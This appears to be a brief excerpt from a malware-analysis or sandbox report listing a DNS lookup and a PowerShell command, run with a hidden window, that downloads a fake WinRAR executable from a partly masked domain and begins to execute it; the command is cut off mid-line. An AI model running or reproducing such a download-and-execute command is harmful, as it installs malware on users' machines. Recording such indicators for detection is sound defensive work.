Technical Information
- DNS ASK ra##ab.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden $down = New-Object System.Net.WebClient; $url = 'http://ra##ab.com/rar/winrar-x64-561nl.exe'; $file = 'winrar-x64-561nl.exe'; $down.DownloadFile($url,$file); $exec = New-Obj...' (with hidden window)